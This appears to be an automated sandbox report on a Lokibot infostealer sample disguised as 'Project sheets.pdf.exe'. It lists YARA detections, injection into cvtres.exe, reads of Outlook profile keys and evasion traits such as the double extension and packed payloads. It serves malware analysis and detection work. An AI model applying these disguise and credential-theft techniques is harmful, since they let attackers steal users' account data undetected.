Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F3130	0_2_017F3130
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F9468	0_2_017F9468
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F0448	0_2_017F0448
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F40D8	0_2_017F40D8
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F2758	0_2_017F2758
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F1F08	0_2_017F1F08
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F9929	0_2_017F9929
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017FA5D0	0_2_017FA5D0
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F61C8	0_2_017F61C8
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017FA5C0	0_2_017FA5C0
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F61B9	0_2_017F61B9
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F9459	0_2_017F9459
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F4030	0_2_017F4030
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F40C8	0_2_017F40C8
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F5B58	0_2_017F5B58
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F5B50	0_2_017F5B50
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F63E8	0_2_017F63E8
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F63D9	0_2_017F63D9
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F7BC8	0_2_017F7BC8
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F4FA8	0_2_017F4FA8
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F4F98	0_2_017F4F98
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F1E68	0_2_017F1E68
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F5E53	0_2_017F5E53
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F6E08	0_2_017F6E08
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F1ECF	0_2_017F1ECF
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F6698	0_2_017F6698
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F6689	0_2_017F6689
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 3_2_0040549C	3_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 3_2_004029D4	3_2_004029D4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: String function: 00405B6F appears 42 times

Source: Project sheets.pdf.exe, 00000000.00000000.235919369.0000000000E42000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQQBCXNMHJF.exe6 vs Project sheets.pdf.exe
Source: Project sheets.pdf.exe, 00000000.00000002.245997342.0000000003130000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWHGDFHKDLHDJD.dll< vs Project sheets.pdf.exe
Source: Project sheets.pdf.exe, 00000000.00000002.245726973.0000000001528000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Project sheets.pdf.exe
Source: Project sheets.pdf.exe, 00000000.00000002.246034817.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWHGDFHKDLHDJD.dll< vs Project sheets.pdf.exe
Source: Project sheets.pdf.exe, 00000000.00000002.246236248.00000000041EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs Project sheets.pdf.exe
Source: Project sheets.pdf.exe	Binary or memory string: OriginalFilenameQQBCXNMHJF.exe6 vs Project sheets.pdf.exe

Source: Project sheets.pdf.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Project sheets.pdf.exe

Static PE information: invalid certificate

Source: Project sheets.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Project sheets.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Project sheets.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Project sheets.pdf.exe "C:\Users\user\Desktop\Project sheets.pdf.exe"
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Code function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

3_2_0040650A

Source: C:\Users\user\Desktop\Project sheets.pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Project sheets.pdf.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@74/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Code function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

3_2_0040434D

Source: Project sheets.pdf.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: Project sheets.pdf.exe, u202c????????????????????????????????????????.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Project sheets.pdf.exe, u202c????????????????????????????????????????.cs	Cryptographic APIs: 'TransformBlock'
Source: Project sheets.pdf.exe, u202c????????????????????????????????????????.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u202c????????????????????????????????????????.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u202c????????????????????????????????????????.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u202c????????????????????????????????????????.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\Project sheets.pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: Project sheets.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Project sheets.pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Project sheets.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: WHGDFHKDLHDJD.pdb source: Project sheets.pdf.exe, 00000000.00000002.245997342.0000000003130000.00000004.08000000.00040000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246034817.00000000031D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: QQBCXNMHJF.pdb source: Project sheets.pdf.exe

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTR

.NET source code contains potential unpacker

Source: Project sheets.pdf.exe, u200b????????????????????????????????????????.cs	.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Project sheets.pdf.exe, u206f????????????????????????????????????????.cs	.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u200b????????????????????????????????????????.cs	.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u206f????????????????????????????????????????.cs	.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Code function: 0_2_017F88F7 pushfd ; iretd	0_2_017F88F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 3_2_00402AC0 push eax; ret	3_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 3_2_00402AC0 push eax; ret	3_2_00402AFC

Source: Project sheets.pdf.exe

Static PE information: real checksum: 0x34a44 should be: 0x37cfc

Source: initial sample

Static PE information: section name: .text entropy: 7.534046578744168

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: Project sheets.pdf.exe

Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
